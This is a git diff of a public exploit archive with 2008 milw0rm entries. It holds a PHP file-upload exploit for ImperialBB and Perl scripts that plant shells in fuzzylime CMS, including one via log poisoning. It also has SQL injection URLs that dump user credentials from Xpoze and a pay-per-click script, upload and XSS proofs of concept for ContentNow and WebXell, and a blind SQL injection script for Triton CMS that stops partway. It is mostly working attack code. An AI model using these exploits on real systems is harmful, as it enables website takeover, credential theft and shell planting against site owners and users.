-	$part2     .=   "Content-Disposition: form-data; name=\"year\"\r\n\r\n";
-	$part2     .=   "0000\r\n";
-	$part2     .=   "-----------------------------200831142015814\r\n";
-	$part2     .=   "Content-Disposition: form-data; name=\"website\"\r\n\r\n\r\n";
-
-	$part2     .=   "-----------------------------200831142015814\r\n";
-	$part2     .=   "Content-Disposition: form-data; name=\"location\"\r\n\r\n\r\n";
-	$part2     .=   "-----------------------------200831142015814\r\n";
-	$part2     .=   "Content-Disposition: form-data; name=\"email_on_pm\"\r\n\r\n";
-	$part2     .=   "0\r\n";
-	$part2     .=   "-----------------------------200831142015814\r\n";
-	$part2     .=   "Content-Disposition: form-data; name=\"OldPass\"\r\n\r\n\r\n";
-	$part2     .=   "-----------------------------200831142015814\r\n";
-	$part2     .=   "Content-Disposition: form-data; name=\"Submit\"\r\n\r\n";
-	$part2     .=   "Submit\r\n";
-	$part2     .=   "-----------------------------200831142015814--\r\n";
-	
-	$part1     .=   "Content-Length: " . strlen($part2) . "\r\n\r\n";
-	
-	
-	
-	$part1     .=   $part2;
-	
-	fwrite($socket, $part1);
-	
-	echo "It might have worked, check if your file is online at -> http://" . $argv[1] . $argv[2] . "/images/avatars/uploads/" . $argv[3] . "_funypicture.php";
-	
-}
-else
-{
-	echo "\n\n";
-	echo "+----.-----------------------------------------------------------+\r\n";
-	echo "|        ImperialBB <= 2.3.5 Remote Upload Vulnerability        |\r\n";
-	echo "|           By PHPLizardo - irc.worldnet.net #carib0u           |\r\n";
-	echo "|        Usage: php exploit.php site.com /path/ user pass       |\r\n";
-	echo "+---------------------------------------------------------------+\r\n";
-	echo "\n\n";
-}
-?>
-
-# milw0rm.com [2008-07-05]
+Title     :    ImperialBB <= 2.3.5 Remote File Upload Vulnerability
+Date      :    5th July 2008
+Found by  :    PHPLizardo - http://phplizardo.2gb.fr
+Greetz    :    Gu1ll4um3r0m41n
+
+Howto     :    1. Go to your User Control Panel
+               2. Upload any file you want
+               3. Tamper the request and change the mime-type to : image/gif
+               4. There is your file : http://site.com/[forum_path]/images/avatars/uploads/[your_nickname]_[filename].[ext]
+			   
+) :\r\n\n";
+	$code     =   trim(fgets(STDIN));
+	
+	$socket   =   @fsockopen($argv[1], 80, $eno, $estr, 30);
+	if(!$socket)
+	{
+		die("Could not connect to ".$argv[1].". Operation aborted.");
+	}
+	
+	$part1      =   "POST " . $argv[2] . "profile.php?func=edit HTTP/1.1\r\n";
+	$part1     .=   "Host: " . $argv[1] . "\r\n";
+	$part1     .=   "Accept: */*\r\n";
+	$part1     .=   "Connection: Close\r\n";
+	$part1     .=   "Cookie: UserName=" . $argv[3] . "; Password=" . md5(md5($argv[4])) . "\r\n";
+	$part1     .=   "Content-Type: multipart/form-data; boundary=---------------------------200831142015814\r\n";
+	
+	$part2     .=   "-----------------------------200831142015814\r\n";
+	$part2     .=   "Content-Disposition: form-data; name=\"Email\"\r\n\r\n";
+	$part2     .=   "test@test.test\r\n";
+	$part2     .=   "-----------------------------200831142015814\r\n";
+	$part2     .=   "Content-Disposition: form-data; name=\"Email2\"\r\n\r\n";
+	$part2     .=   "test@test.test\r\n";
+	$part2     .=   "-----------------------------200831142015814\r\n";
+	$part2     .=   "Content-Disposition: form-data; name=\"OldPass\"\r\n\r\n\r\n";
+	$part2     .=   "-----------------------------200831142015814\r\n";
+	$part2     .=   "Content-Disposition: form-data; name=\"PassWord\"\r\n\r\n\r\n";
+	$part2     .=   "-----------------------------200831142015814\r\n";
+	$part2     .=   "Content-Disposition: form-data; name=\"Pass2\"\r\n\r\n\r\n";
+	$part2     .=   "-----------------------------200831142015814\r\n";
+	$part2     .=   "Content-Disposition: form-data; name=\"signature\"\r\n\r\n\r\n";
+	$part2     .=   "-----------------------------200831142015814\r\n";
+	$part2     .=   "Content-Disposition: form-data; name=\"aim\"\r\n\r\n\r\n";
+	$part2     .=   "-----------------------------200831142015814\r\n";
+	$part2     .=   "Content-Disposition: form-data; name=\"icq\"\r\n\r\n\r\n";
+	$part2     .=   "-----------------------------200831142015814\r\n";
+	$part2     .=   "Content-Disposition: form-data; name=\"msn\"\r\n\r\n\r\n";
+	$part2     .=   "-----------------------------200831142015814\r\n";
+	$part2     .=   "Content-Disposition: form-data; name=\"yahoo\"\r\n\r\n\r\n";
+	$part2     .=   "-----------------------------200831142015814\r\n";
+	$part2     .=   "Content-Disposition: form-data; name=\"Remote_Avatar_URL\"\r\n\r\n\r\n";
+	$part2     .=   "-----------------------------200831142015814\r\n";
+	$part2     .=   "Content-Disposition: form-data; name=\"Upload_Avatar\"; filename=\"funypicture.php\"\r\n";
+	$part2     .=   "Content-Type: image/gif\r\n\r\n";
+	$part2     .=   $code."\r\n";
+	$part2     .=   "-----------------------------200831142015814\r\n";
+	$part2     .=   "Content-Disposition: form-data; name=\"month\"\r\n\r\n";
+	$part2     .=   "00\r\n";
+	$part2     .=   "-----------------------------200831142015814\r\n";
+	$part2     .=   "Content-Disposition: form-data; name=\"day\"\r\n\r\n";
+	$part2     .=   "00\r\n";
+	$part2     .=   "-----------------------------200831142015814\r\n";
+	$part2     .=   "Content-Disposition: form-data; name=\"year\"\r\n\r\n";
+	$part2     .=   "0000\r\n";
+	$part2     .=   "-----------------------------200831142015814\r\n";
+	$part2     .=   "Content-Disposition: form-data; name=\"website\"\r\n\r\n\r\n";
+
+	$part2     .=   "-----------------------------200831142015814\r\n";
+	$part2     .=   "Content-Disposition: form-data; name=\"location\"\r\n\r\n\r\n";
+	$part2     .=   "-----------------------------200831142015814\r\n";
+	$part2     .=   "Content-Disposition: form-data; name=\"email_on_pm\"\r\n\r\n";
+	$part2     .=   "0\r\n";
+	$part2     .=   "-----------------------------200831142015814\r\n";
+	$part2     .=   "Content-Disposition: form-data; name=\"OldPass\"\r\n\r\n\r\n";
+	$part2     .=   "-----------------------------200831142015814\r\n";
+	$part2     .=   "Content-Disposition: form-data; name=\"Submit\"\r\n\r\n";
+	$part2     .=   "Submit\r\n";
+	$part2     .=   "-----------------------------200831142015814--\r\n";
+	
+	$part1     .=   "Content-Length: " . strlen($part2) . "\r\n\r\n";
+	
+	
+	
+	$part1     .=   $part2;
+	
+	fwrite($socket, $part1);
+	
+	echo "It might have worked, check if your file is online at -> http://" . $argv[1] . $argv[2] . "/images/avatars/uploads/" . $argv[3] . "_funypicture.php";
+	
+}
+else
+{
+	echo "\n\n";
+	echo "+----.-----------------------------------------------------------+\r\n";
+	echo "|        ImperialBB <= 2.3.5 Remote Upload Vulnerability        |\r\n";
+	echo "|           By PHPLizardo - irc.worldnet.net #carib0u           |\r\n";
+	echo "|        Usage: php exploit.php site.com /path/ user pass       |\r\n";
+	echo "+---------------------------------------------------------------+\r\n";
+	echo "\n\n";
+}
+?>
+
+# milw0rm.com [2008-07-05]
diff --git a/platforms/php/webapps/6009.pl b/platforms/php/webapps/6009.pl
index 6e65d3842..d7972559c 100755
--- a/platforms/php/webapps/6009.pl
+++ b/platforms/php/webapps/6009.pl
@@ -1,106 +1,106 @@
-#!/usr/bin/perl
-#
-# fuzzylime 3.0.1 Perl exploit
-#
-# discovered & written by Ams
-# ax330d@gmail.com
-#
-# DESCRIPTION:
-# There are availability to load files through script
-# rss.php, and also there are unfiltered extract(); usage.
-# This exploit creates shell in /code/counter/middle_index_inc.php
-#
-# USAGE:
-# Run exploit: perl expl.pl http://www.site.com
-#
-# NEEDED:
-# magic_quotes_gpc=off
-#
-
-use strict;
-use IO::Socket;
-
-print "\n\t~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-	\n\t\t fuzzlyime 3.0.1 exploit
-	\n\t~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n";
-
-if(@ARGV<1){
-	die "\n\tUsage:\texpl.pl url\n\n
-	\n\tExample:\texpl.pl http://localhost/path/\n\n";
-}
-
-my $expl_url=$ARGV[0];
-my $shell=q~
-
-~;
-my $shell_name='middle_index.inc.php';
-
-print "\tStarting exploit...\n";
-if($expl_url=~m#http://#){
-	exploit($expl_url);
-} else {
-	exploit('http://'.$expl_url);
-}
-
-sub exploit {
-	#	Defining...
-	my $site=pop @_;
-	(my $a,my $b,my $c,my @d)=split /\//,$site;
-	my $path=join('/',@d);
-	my $host=$c;
-	if($path) {$path='/'.$path;}
-	my $injection="p=../code/content.php%00&s=$shell_name%00&curcount=$shell";
-	my $length=length($injection);
-
-	#	Injecting...
-	my $socket=IO::Socket::INET->new(
-		Proto=>"tcp",
-		PeerAddr=>$host,
-		PeerPort=>"80"
-	);
-	if( ! $socket){
-		die("\n\tUnable to connect to http://$host\n\n");
-	} else {
-		
-		my $packet = "POST $path/rss.php HTTP/1.1\r\n";
-		$packet .= "Host: $host\r\n";
-		$packet .= "Connection: Close\r\n";
-		$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
-		$packet .= "Content-Length: $length\r\n\r\n";
-		$packet .= "$injection";
-		print $socket $packet;
-		close($socket);
-	}
-	sleep(1);
-	#	Checking for shell...
-	$socket=IO::Socket::INET->new(
-		Proto=>"tcp",
-		PeerAddr=>$host,
-		PeerPort=>"80"
-	);
-	if( ! $socket){
-		die("\n\tUnable to connect to http://$host (check shell yourself)\n\n");
-	} else {
-		my $packet = "POST $path/code/counter/$shell_name HTTP/1.1\r\n";
-		$packet .= "Host: $host\r\n";
-		$packet .= "Connection: Close\r\n\r\n";
-		print $socket $packet;
-
-		my $rcv;
-		my $dat='';
-		while($rcv=<$socket>){
-			$dat.=$rcv;
-		}
-		if ($dat =~ /200 OK/){
-			print "\n\t$site\t[OK]\n\n";
-		} else {
-			print "\n\t$site\t[FAIL]\n\n";
-		}
-		close($socket);
-	}
-}
-
-# milw0rm.com [2008-07-05]
+#!/usr/bin/perl
+#
+# fuzzylime 3.0.1 Perl exploit
+#
+# discovered & written by Ams
+# ax330d@gmail.com
+#
+# DESCRIPTION:
+# There are availability to load files through script
+# rss.php, and also there are unfiltered extract(); usage.
+# This exploit creates shell in /code/counter/middle_index_inc.php
+#
+# USAGE:
+# Run exploit: perl expl.pl http://www.site.com
+#
+# NEEDED:
+# magic_quotes_gpc=off
+#
+
+use strict;
+use IO::Socket;
+
+print "\n\t~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+	\n\t\t fuzzlyime 3.0.1 exploit
+	\n\t~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n";
+
+if(@ARGV<1){
+	die "\n\tUsage:\texpl.pl url\n\n
+	\n\tExample:\texpl.pl http://localhost/path/\n\n";
+}
+
+my $expl_url=$ARGV[0];
+my $shell=q~
+
+~;
+my $shell_name='middle_index.inc.php';
+
+print "\tStarting exploit...\n";
+if($expl_url=~m#http://#){
+	exploit($expl_url);
+} else {
+	exploit('http://'.$expl_url);
+}
+
+sub exploit {
+	#	Defining...
+	my $site=pop @_;
+	(my $a,my $b,my $c,my @d)=split /\//,$site;
+	my $path=join('/',@d);
+	my $host=$c;
+	if($path) {$path='/'.$path;}
+	my $injection="p=../code/content.php%00&s=$shell_name%00&curcount=$shell";
+	my $length=length($injection);
+
+	#	Injecting...
+	my $socket=IO::Socket::INET->new(
+		Proto=>"tcp",
+		PeerAddr=>$host,
+		PeerPort=>"80"
+	);
+	if( ! $socket){
+		die("\n\tUnable to connect to http://$host\n\n");
+	} else {
+		
+		my $packet = "POST $path/rss.php HTTP/1.1\r\n";
+		$packet .= "Host: $host\r\n";
+		$packet .= "Connection: Close\r\n";
+		$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
+		$packet .= "Content-Length: $length\r\n\r\n";
+		$packet .= "$injection";
+		print $socket $packet;
+		close($socket);
+	}
+	sleep(1);
+	#	Checking for shell...
+	$socket=IO::Socket::INET->new(
+		Proto=>"tcp",
+		PeerAddr=>$host,
+		PeerPort=>"80"
+	);
+	if( ! $socket){
+		die("\n\tUnable to connect to http://$host (check shell yourself)\n\n");
+	} else {
+		my $packet = "POST $path/code/counter/$shell_name HTTP/1.1\r\n";
+		$packet .= "Host: $host\r\n";
+		$packet .= "Connection: Close\r\n\r\n";
+		print $socket $packet;
+
+		my $rcv;
+		my $dat='';
+		while($rcv=<$socket>){
+			$dat.=$rcv;
+		}
+		if ($dat =~ /200 OK/){
+			print "\n\t$site\t[OK]\n\n";
+		} else {
+			print "\n\t$site\t[FAIL]\n\n";
+		}
+		close($socket);
+	}
+}
+
+# milw0rm.com [2008-07-05]
diff --git a/platforms/php/webapps/6010.txt b/platforms/php/webapps/6010.txt
index 02ef56fe1..5434f14d6 100755
--- a/platforms/php/webapps/6010.txt
+++ b/platforms/php/webapps/6010.txt
@@ -1,25 +1,25 @@
-######################
-*^Hiva Digital Security Team^
-          ^HIva Team^
-######################
-*Script:
-Xpoze Pro CMS 2008
-XPOZE Pro 3.06 SQL Injection Exploit
-######################
-*Demo:
-http://demo.xpoze.org/
-######################
-*Authors:
-farenh3it, sn0wman
-######################
-*Exploit:
-
-/user.html?uid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat(user,0x3a,pass),19,20,21,22,id,24,25,26,27,29,30,31,32,33+FROM+users+WHERE+id=1/*
-
-######################
-*for exam: 
-http://demo.xpoze.org/user.html?uid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat(user,0x3a,pass),19,20,21,22,id,24,25,26,27,29,30,31,32,33+FROM+users+WHERE+id=1/*
-######################
-*Thanks to str0ke :X
-
-# milw0rm.com [2008-07-06]
+######################
+*^Hiva Digital Security Team^
+          ^HIva Team^
+######################
+*Script:
+Xpoze Pro CMS 2008
+XPOZE Pro 3.06 SQL Injection Exploit
+######################
+*Demo:
+http://demo.xpoze.org/
+######################
+*Authors:
+farenh3it, sn0wman
+######################
+*Exploit:
+
+/user.html?uid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat(user,0x3a,pass),19,20,21,22,id,24,25,26,27,29,30,31,32,33+FROM+users+WHERE+id=1/*
+
+######################
+*for exam: 
+http://demo.xpoze.org/user.html?uid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat(user,0x3a,pass),19,20,21,22,id,24,25,26,27,29,30,31,32,33+FROM+users+WHERE+id=1/*
+######################
+*Thanks to str0ke :X
+
+# milw0rm.com [2008-07-06]
diff --git a/platforms/php/webapps/6011.txt b/platforms/php/webapps/6011.txt
index 7c6503485..696297d44 100755
--- a/platforms/php/webapps/6011.txt
+++ b/platforms/php/webapps/6011.txt
@@ -1,58 +1,58 @@
-===============================================================
-  ContentNow CMS (Upload/XSS) Multiple Remote Vulnerabilities
-===============================================================
-
-  ,--^----------,--------,-----,-------^--,
-  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
-  `+---------------------------^----------|
-    `\_,-------, _________________________|
-      / XXXXXX /`|     /
-     / XXXXXX /  `\   /
-    / XXXXXX /\______(
-   / XXXXXX /           
-  / XXXXXX /
- (________(             
-  `------'
-
-
-AUTHOR : CWH Underground
-DATE   : 6 July 2008
-SITE   : cwh.citec.us
-
-
-#####################################################
- APPLICATION : Content CMS
- VERSION     : 1.4.1
- VENDOR	     : http://www.contentnow.mf4k.de
- DOWNLOAD    : http://downloads.sourceforge.net/contentnow/contentNow_141.zip
-#####################################################
-
---- Arbitrary File Upload ---
-
-	This Vulnerability can upload malicious files direct to web server.
-
-[Login as user]
-
-[+] Upload Path: http://[Target]/[contentNow_path]/upload.php?path=/[contentNow_path]/upload/
-
-    [-] Example: http://192.168.24.25/contentNow/cn/upload.php?path=/contentNow/upload/
-
-[+] Shell Script: http://[Target]/[contentNow_path]/upload/file/[Evil File]
-
-    [-] Example: http://192.168.24.25/contentNow/upload/file/myshell.php
-
-
---- Remote XSS Exploit ---
-
--------------
- POC Exploit
--------------
-
-[+] http://192.168.24.25/contentnow/upload/file/language_menu.php/>">
-[+] http://192.168.24.25/contentnow/upload/file/language_menu.php?pageid=>">&clang=en
-
-##################################################################
-  Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  
-##################################################################
-
-# milw0rm.com [2008-07-06]
+===============================================================
+  ContentNow CMS (Upload/XSS) Multiple Remote Vulnerabilities
+===============================================================
+
+  ,--^----------,--------,-----,-------^--,
+  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
+  `+---------------------------^----------|
+    `\_,-------, _________________________|
+      / XXXXXX /`|     /
+     / XXXXXX /  `\   /
+    / XXXXXX /\______(
+   / XXXXXX /           
+  / XXXXXX /
+ (________(             
+  `------'
+
+
+AUTHOR : CWH Underground
+DATE   : 6 July 2008
+SITE   : cwh.citec.us
+
+
+#####################################################
+ APPLICATION : Content CMS
+ VERSION     : 1.4.1
+ VENDOR	     : http://www.contentnow.mf4k.de
+ DOWNLOAD    : http://downloads.sourceforge.net/contentnow/contentNow_141.zip
+#####################################################
+
+--- Arbitrary File Upload ---
+
+	This Vulnerability can upload malicious files direct to web server.
+
+[Login as user]
+
+[+] Upload Path: http://[Target]/[contentNow_path]/upload.php?path=/[contentNow_path]/upload/
+
+    [-] Example: http://192.168.24.25/contentNow/cn/upload.php?path=/contentNow/upload/
+
+[+] Shell Script: http://[Target]/[contentNow_path]/upload/file/[Evil File]
+
+    [-] Example: http://192.168.24.25/contentNow/upload/file/myshell.php
+
+
+--- Remote XSS Exploit ---
+
+-------------
+ POC Exploit
+-------------
+
+[+] http://192.168.24.25/contentnow/upload/file/language_menu.php/>">
+[+] http://192.168.24.25/contentnow/upload/file/language_menu.php?pageid=>">&clang=en
+
+##################################################################
+  Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  
+##################################################################
+
+# milw0rm.com [2008-07-06]
diff --git a/platforms/php/webapps/6014.txt b/platforms/php/webapps/6014.txt
index 70bd488ad..068b547fd 100755
--- a/platforms/php/webapps/6014.txt
+++ b/platforms/php/webapps/6014.txt
@@ -1,16 +1,16 @@
-+---------------------------------------+
-|   Blind SQL Injection Vulnerability   |
-|      in  Pay Per Click Script         |
-|     found by Hamtaro aka CorVu5       |
-|there must be 50 ways to learn to hover|
-+---------------------------------------+
- 
-#gdork: "Pay Per Click Script powered by SmartPPC.com."
- 
-#vuln: site.com/directory.php?username=&idDirectory=90992%20and%20ascii(substring((SELECT%20concat(username,0x3a,pass)%20from%20users%20limit%200,1),1,1))%3E108
- 
-#login: site.com/accounts.php
----------------------------------------
-greetz Hamtaro aka CorVu5
-
-# milw0rm.com [2008-07-07]
++---------------------------------------+
+|   Blind SQL Injection Vulnerability   |
+|      in  Pay Per Click Script         |
+|     found by Hamtaro aka CorVu5       |
+|there must be 50 ways to learn to hover|
++---------------------------------------+
+ 
+#gdork: "Pay Per Click Script powered by SmartPPC.com."
+ 
+#vuln: site.com/directory.php?username=&idDirectory=90992%20and%20ascii(substring((SELECT%20concat(username,0x3a,pass)%20from%20users%20limit%200,1),1,1))%3E108
+ 
+#login: site.com/accounts.php
+---------------------------------------
+greetz Hamtaro aka CorVu5
+
+# milw0rm.com [2008-07-07]
diff --git a/platforms/php/webapps/6015.txt b/platforms/php/webapps/6015.txt
index 6c6293e74..274789e0f 100755
--- a/platforms/php/webapps/6015.txt
+++ b/platforms/php/webapps/6015.txt
@@ -1,72 +1,72 @@
-===========================================================================
-  WebXell Editor (upload_pictures.php) Arbitrary File Upload Vulnerability
-===========================================================================
-
-  ,--^----------,--------,-----,-------^--,
-  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
-  `+---------------------------^----------|
-    `\_,-------, _________________________|
-      / XXXXXX /`|     /
-     / XXXXXX /  `\   /
-    / XXXXXX /\______(
-   / XXXXXX /           
-  / XXXXXX /
- (________(             
-  `------'
-
-
-AUTHOR : CWH Underground
-DATE   : 7 July 2008
-SITE   : cwh.citec.us
-
-
-#####################################################
- APPLICATION : WebXell Editor
- VERSION     : 0.1.3
- VENDOR	     : N/A
- DOWNLOAD    : http://downloads.sourceforge.net/webxelleditor/webXell-0.1.3.zip
-#####################################################
-
---- Arbitrary File Upload ---
-
-	This Vulnerability can upload malicious files direct to web server.
-Use Web proxy (Webscarab,etc..) to intercept data.
-
-[+] Upload Path: http://[Target]/[webxell_path]/upload_pictures.php
-
- [-] POC Exploit:
-
-POST http://192.168.24.25/webxell/upload_pictures.php HTTP/1.1
-Host: 192.168.24.25
-User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15
-Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
-Accept-Language: en-us,en;q=0.5
-Accept-Encoding: gzip,deflate
-Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
-Keep-Alive: 300
-Proxy-Connection: keep-alive
-Referer: http://192.168.24.25/webxell/index.php?file=test.xml
-Cookie: storyread[1]=1; PHPSESSID=a663694e586aba414a1b9fb79917891f
-Content-Type: multipart/form-data; boundary=---------------------------278151583918669
-Content-length: 241
-
------------------------------278151583918669
-Content-Disposition: form-data; name="updFile"; filename="phpbug.php"
-Content-Type: img/jpeg
-
-
------------------------------278151583918669--
-
-
-[+] Shell Script: ***You can intercept file's name with Web proxy that tell the real name***
-
- [-] Position: http://[target]/[webxell_path]/upload/[Evil_File]
-
-
-##################################################################
-  Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  
-##################################################################
-
-# milw0rm.com [2008-07-07]
+===========================================================================
+  WebXell Editor (upload_pictures.php) Arbitrary File Upload Vulnerability
+===========================================================================
+
+  ,--^----------,--------,-----,-------^--,
+  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
+  `+---------------------------^----------|
+    `\_,-------, _________________________|
+      / XXXXXX /`|     /
+     / XXXXXX /  `\   /
+    / XXXXXX /\______(
+   / XXXXXX /           
+  / XXXXXX /
+ (________(             
+  `------'
+
+
+AUTHOR : CWH Underground
+DATE   : 7 July 2008
+SITE   : cwh.citec.us
+
+
+#####################################################
+ APPLICATION : WebXell Editor
+ VERSION     : 0.1.3
+ VENDOR	     : N/A
+ DOWNLOAD    : http://downloads.sourceforge.net/webxelleditor/webXell-0.1.3.zip
+#####################################################
+
+--- Arbitrary File Upload ---
+
+	This Vulnerability can upload malicious files direct to web server.
+Use Web proxy (Webscarab,etc..) to intercept data.
+
+[+] Upload Path: http://[Target]/[webxell_path]/upload_pictures.php
+
+ [-] POC Exploit:
+
+POST http://192.168.24.25/webxell/upload_pictures.php HTTP/1.1
+Host: 192.168.24.25
+User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15
+Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+Accept-Language: en-us,en;q=0.5
+Accept-Encoding: gzip,deflate
+Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+Keep-Alive: 300
+Proxy-Connection: keep-alive
+Referer: http://192.168.24.25/webxell/index.php?file=test.xml
+Cookie: storyread[1]=1; PHPSESSID=a663694e586aba414a1b9fb79917891f
+Content-Type: multipart/form-data; boundary=---------------------------278151583918669
+Content-length: 241
+
+-----------------------------278151583918669
+Content-Disposition: form-data; name="updFile"; filename="phpbug.php"
+Content-Type: img/jpeg
+
+
+-----------------------------278151583918669--
+
+
+[+] Shell Script: ***You can intercept file's name with Web proxy that tell the real name***
+
+ [-] Position: http://[target]/[webxell_path]/upload/[Evil_File]
+
+
+##################################################################
+  Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  
+##################################################################
+
+# milw0rm.com [2008-07-07]
diff --git a/platforms/php/webapps/6016.pl b/platforms/php/webapps/6016.pl
index 0e6c3a0d8..6b5cc2944 100755
--- a/platforms/php/webapps/6016.pl
+++ b/platforms/php/webapps/6016.pl
@@ -1,45 +1,45 @@
-#!/usr/bin/perl
-# ----------------------------------------------------------
-# Fuzzylime CMS 3.01 Multiple LFI / RCE
-# author  : Cod3rZ
-# website : http://cod3rz.helloweb.eu
-# ----------------------------------------------------------
-# http://[site]/blog.php?file=../[file]\0
-# http://[site]/code/newsheads.php?heads=../[file]\0
-# post
-# http://[site]/code/commupdate.php (type=count&s=[file]\0)
-# ----------------------------------------------------------
-# LFI to RCE:
-# ----------------------------------------------------------
-
-use LWP::UserAgent;
-
- system("cls");
-#system("clear");
-
- print " -------------------------------------------------\n";
- print " Fuzzylime CMS 3.01 LFI / RCE                     \n";
- print " Powered by Cod3rZ                                \n";
- print " http://cod3rz.helloweb.eu                        \n";
- print " -------------------------------------------------\n";
- print " Insert Site (http://site.com/):                  \n ";
- chomp($site = );
- print " -------------------------------------------------\n";
- print " Insert Logs path                                 \n ";
- chomp($path = );
- print " -------------------------------------------------\n";
- 
- #Infect Logs
- $lwp = LWP::UserAgent->new;
- $siten = $site.'/blog.php?file=';
- $ua = $lwp->get($site.'coderz  /coderz');
- #Control
- $ua = $lwp->get($site.$path.'%00');
- if($ua->content =~ m/cod3rz/) {
- print " Ok ".$site." is infected                         \n";
- print " -------------------------------------------------\n";
- print " ".$siten.$path."&cmd=[command]\\0                 \n";
- print " -------------------------------------------------\n";
- }
-
-# milw0rm.com [2008-07-07]
+#!/usr/bin/perl
+# ----------------------------------------------------------
+# Fuzzylime CMS 3.01 Multiple LFI / RCE
+# author  : Cod3rZ
+# website : http://cod3rz.helloweb.eu
+# ----------------------------------------------------------
+# http://[site]/blog.php?file=../[file]\0
+# http://[site]/code/newsheads.php?heads=../[file]\0
+# post
+# http://[site]/code/commupdate.php (type=count&s=[file]\0)
+# ----------------------------------------------------------
+# LFI to RCE:
+# ----------------------------------------------------------
+
+use LWP::UserAgent;
+
+ system("cls");
+#system("clear");
+
+ print " -------------------------------------------------\n";
+ print " Fuzzylime CMS 3.01 LFI / RCE                     \n";
+ print " Powered by Cod3rZ                                \n";
+ print " http://cod3rz.helloweb.eu                        \n";
+ print " -------------------------------------------------\n";
+ print " Insert Site (http://site.com/):                  \n ";
+ chomp($site = );
+ print " -------------------------------------------------\n";
+ print " Insert Logs path                                 \n ";
+ chomp($path = );
+ print " -------------------------------------------------\n";
+ 
+ #Infect Logs
+ $lwp = LWP::UserAgent->new;
+ $siten = $site.'/blog.php?file=';
+ $ua = $lwp->get($site.'coderz  /coderz');
+ #Control
+ $ua = $lwp->get($site.$path.'%00');
+ if($ua->content =~ m/cod3rz/) {
+ print " Ok ".$site." is infected                         \n";
+ print " -------------------------------------------------\n";
+ print " ".$siten.$path."&cmd=[command]\\0                 \n";
+ print " -------------------------------------------------\n";
+ }
+
+# milw0rm.com [2008-07-07]
diff --git a/platforms/php/webapps/6017.pl b/platforms/php/webapps/6017.pl
index 2bf7bc70e..d049fc3e0 100755
--- a/platforms/php/webapps/6017.pl
+++ b/platforms/php/webapps/6017.pl
@@ -1,122 +1,122 @@
-#!/usr/bin/perl -w
-#Triton CMS Pro (X-Forwarded-For) Blind SQL Injection
-#Admin's username/hash disclosure exploit
-#Benchmark() method, so take a coffee and relax
-#Coded by __GiReX__
-
-use LWP::UserAgent;
-use HTTP::Request;
-
-if(not defined $ARGV[0])
-{
-	print "\nUsage: perl $0 [host] [path] [1/2]\n";
-	print "Example: perl $0 localhost /tcms/\n";
-	exit;
-}
-
-my $host  = ($ARGV[0] =~ /^http:\/\//) ?  $ARGV[0]:  'http://' . $ARGV[0];
-   $host .=  $ARGV[1] unless not defined $ARGV[1];
-
-my $client =  new LWP::UserAgent;
-my $get    =  new HTTP::Request('GET', $host);
-my @cset   =  (97..122, 0);               # Only  a-z  charset for username exploit if need change it
-my @cset2  =  (48..57, 97..102); 
-my $prefix =  "tc_";         
-
-my ($i, $j) = (0, 1);
-my ($user, $hash) = (undef, undef);
-
-banner();
-
-while($i != $#cset)
-{  
-   for($i = 0; $i <= $#cset; $i++)
-   {
-    my ($pre_time, $post_time) = time();	
-	
-	info(chr($cset[$i]), "Username", $user);
-	$rv = check_char($cset[$i], $j, "username");
-	$post_time = time();	
-	
-	 if($post_time - $pre_time > 3 and $rv)
-	 {
-		$user .= chr($cset[$i]); 
-		last;
-	 }
-   }
-
-  $j++;
-}
-
-if(not defined $user)
-{
-     print STDOUT "\n\n[-] Exploit mistake: please check the benchmark and expected time\n\n";
-	 exit;
-}
-else
-{
-     print STDOUT "\n[+] Admin Hashed Pass: \r";
-}
-
-for($j = 0; $j <= 32; $j++)
-{  
-    for($i = 0; $i <= $#cset2; $i++)
-    {
-     $pre_time = time();	
-	
-	 info(chr($cset2[$i]), "Hashed Pass", $hash);
-	 $rv = check_char($cset2[$i], $j, "password");
-	 $post_time = time();	
-	
-         if($post_time - $pre_time > 3 and $rv)
-	     {
-	         $hash .= chr($cset2[$i]);
-	         last;
-	     }
-    }
-}
-
-if(not defined $hash or length($hash) != 32)
-{
-     print STDOUT "\n\n[-] Exploit mistake: please check the benchmark expected time\n\n";
-}
-else 
-{
-     print STDOUT "\n\n[+] Exploit terminated\n\n";
-}
-
-
-sub banner
-{
-   print "\n";
-   print "[+] Triton CMS Pro (X-Forwarded-For) Blind SQL Injection\n";
-   print "[+] Admin's username/hash disclosure exploit\n";
-   print "[+] Coded by __GiReX__\n";
-   print "\n";
-}
-
-sub info
-{
-  my($c, $str, $cur)  =  @_;
-	
-	$cur = '' unless defined $cur;
-	print  STDOUT "[+] Admin ${str}: ${cur}${c}\r";
-	
- $| = 1; 
-}
-
-sub check_char
-{
-  my ($char, $n, $field)  =  @_ ;
-   
-    $get->header('X-Forwarded-For' =>  "-1' AND ".
